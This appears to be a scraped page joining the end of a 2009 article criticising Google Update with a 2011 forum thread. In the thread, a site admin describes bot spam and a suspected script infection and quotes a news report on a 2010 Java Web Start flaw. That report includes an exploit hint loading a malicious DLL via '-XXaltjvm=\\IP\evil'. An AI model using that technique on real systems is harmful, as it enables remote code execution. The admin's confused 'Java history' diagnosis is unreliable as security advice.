“When Google Update determines that the Windows Task Scheduler or Service mechanisms are not working as expected,” says the blog, “we have added in fallback mechanisms that cause Google Update to begin running as a continuous process again.”

So much for user control.

You might wonder what all the fuss is about. After all, what’s wrong with keeping your software up to date? Obviously, there’s nothing wrong with it, but Google’s Update software flies in the face of over 20 years of software best practices — there’s simply no need for desktop software to run update checks continuously, or even once an hour.

It’s not hard to see how Google views Update: it’s a way for it to have the constant update capabilities its web apps enjoy, but on your desktop. The problem is that while we accept that we can’t control the web, we most definitely can (and want to) control what happens on our laptops and PCs.

Or at least we could until Google decided we couldn’t.

The well-established practice of checking for updates when an application launches has been serving the industry — and some of its biggest names, like Adobe and Microsoft — well for for decades.

The latest version of Google Update is a baby-step in the right direction, but we still won’t be using Chrome, Google Earth or anything else that relies of Google Update until Google does the right thing.

The Mac version of Google update remains unchanged.

http://www.webmonkey.com/2009/07/google_update_now_a_scheduled_task__but_still_evil/
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 03:32:27 am
Okay so caught up the events of the past few days...

JAVA ATTACKS

Couple days ago we got hacked big time. First by a swarm of what I assume were robots, by the speed and frequency of the attacks... But these were SMART bots... they got past chaptcha (we had a simple one at the time) REGISTERED an account and added weblinks to that account.  After the fact I set it to Admin approval and added three questions. That stopped them but I see in error logs that they are still knocking daily. It is this stopping them that IDed them as bots

so looking up a couple IP addresses that we banned  like this one that just hit now over 6 times...

31.184.238.8  at this site...   http://www.stopforumspam.com/search.php

yields over 500 aliases for that IP. You can search that site using a user name, an IP or an email

Well then yesterday we got all our users getting the redirects, false links, virus warnings etc.. all different depending on the browser used, the anti virus program etc... I posted some of the screen captures.

Called up my server to fix the issue... they found some JAVA scripts had gotten in. So we reloaded a saved database and tried again.  No help access still messed up, but stopped the alerts.

We tried getting access but would get blank pages. Russo spotted a 2 in the address and changed it to a 1 and bang he was in. So there was a script adding and subtracting numbers to the commands

We were up late trying to figure out what was going on and on one screen I saw at the bottom notifications on mouse over... "java history (-1)"  So something in the java folder was causing this.
Now I run several cleaners like CC Cleaner to get cookies etc out. I DID NOT know until last night that it doesn't clean out JAVA

At this point I didn't know that yet... we were tired so I moved the forum to a temp folder and got some sleep. Next morning I uploaded my copy of the forum to the server... hoping that would get me a fresh starting point... same login issues  WTF? How can that be?  fresh upload should have worked.  Server techs figured the database must be corrupt...


Then I loaded up IE ( I NEVER do that :P ) and found I could log in... but since my firefox still had me locked in, I couldn't do anything... so okay this HAS to be some hidden cookie issue but there were NONE in IE or FF cleaned them all out, etc... ran everything I had, checked my security into computer everything was fine..

Okay so no go... I then remembered the JAVA history issue and googled it;

"clearing java history"  and got right away to this PDF

How to Delete Browsing History from Java (https://portals.usw.edu/estudent/documents/BBStudentGuide/HowtoDeleteBrowsingHistory.pdf)

It was from that file I got the instructions I posted at the top. Other operating systems are in the file.

I deleted the history... tried again and everything worked.  The forum was now intact (save the front portal due to database restore) Log in worked no more alerts NOTHING. Told the other admins  they cleared the history and voila  all good.

So far its been error free for over 24 hours, though the bots are hammering away.

Okay so how does all this tie together?

It SEEMS that what is happening is that a java script lurks outside the front door somehow... I am no expert, just an observer. It then SEEMS to attach itself to a user logging in to a forum. So you go visit say ATS and this script sticks to your browser like a burr... then you visit other forums and it hitch hikes.

So YOU the user thinks the forum you are visiting is giving you a virus, redirect or other alert... and the forum owners can't find it (one found one is an ad  coincidence I think) Well they can't find it because its not INSIDE, its lurking when you log in, especially with IE users.

And the forum owners are saying 'Its not us... its your browser doing it. Well in a sense that is true. It is coming via the browser, by a parasite riding along.

So conspiracy people will get all up in arms, blame the operators, blame the PTB, the three letter clubs etc. But then I see that report that Area 51 Swarm Control is having the SAME nuisance attacks and false positives... and THEY don't know what is going on... then I know its not the PTB doing this.

If I could reach them ( I will try) I would suggest they look at the JAVA issue, because even the secret servers and networks operate using JAVA. I cannot say for sure that their problem is the same, but if I were them I would look at that.

Once I cleaned the JAVA history... my PC and the forum are moving faster  a LOT faster. I had a lag before... its now gone... was likely the cookies in the browser doing it. I don't know but can see the results
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 03:54:27 am
So then we looked back on the web for JAVA issues and BTS found this

Serious New Java Flaw Affects All Current Versions of Windows (http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-current-versions-windows-040910)

April 9, 2010, 9:37AM

Quote
There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years.

Quote
In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw.

"Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory.

Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable.

Serious New Java Flaw Affects All Current Versions of Windows (http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-current-versions-windows-040910)

JavaWS and Javaws.exe



Quote
In his advisory, Ormandy said that he notified Sun about the vulnerability but that the vendor didn't believe it was serious enough to warrant an emergency patch.

"The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor," Ormandy said.

The workaround for this problem is to disable JavaWS and Javaws.exe, Santamarta said in his advisory. Ormandy has set up a proof-of-concept URL, included in his advisory, that demonstrates the exploit.

Julien Tinnes has more information about this class of Java vulnerability.

Javocalypse (http://=http://blog.cr0.org/2010/04/javacalypse.html)

Quote
EDIT: Following its full disclosure Sun fixed Tavis' Java deployment toolkit bug (CVE-2010-0886 and CVE-2010-0887) in a matter of days, wow! No doubts this will be used in the future as an argument for full disclosure.
However, this does not bring much security! An attacker can still automatically downgrade your version of Java (using installJRE) and exploit this bug or any other he likes!

Almost one year ago, I blogged about one of my favorite security bug, found by Sami Koivu.

More specifically, I blogged about a class of Java bugs exposed by Sami Koivu and I mentioned this was the first instance of it.


So I repeat... CLEAN OUT YOUR JAVA HISTORY NOW


Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 03:58:12 am
The previous information has been provide by a lot of blood and sweat..

If you find any of it useful to save your butt, please donate to the cause...

as soon as I figure out how to put the dang Buttons back in  :P

 ::)

 8)

Stay tuned for addition updates. I don't know yet if we are out of hot water but my server team is working on beefing up security (they better be for what they charge :P )


PS To any spooks listening in... please relay this to the appropriate commands and have them check for this
Title: Re: Internet Wars and Java Attacks
Post by: Dood on October 08, 2011, 04:38:51 am
I cleaned out mine.  Not all difficult either...
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 04:58:21 am
Great to see you made it in. I was watching the error logs and saw your repeated attempts using a history file. Figured I better email you :D

Now I can get some sleep... its been quiet for over 24 hours and the bots are still pounding at the door. So I will save another backup now and get some rest
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 02:45:18 pm
Update: Reply from ATS

This really, REALLY sounds like something picked up via an email or blackhat site that waits until you try to log into another site (any log in could trigger it) and launches a key-logger in the hope of getting log in information.

Usually all these type are really interested in is financial account log ins.

Thanks for the heads up, I'm letting Bill know just in case.

mark...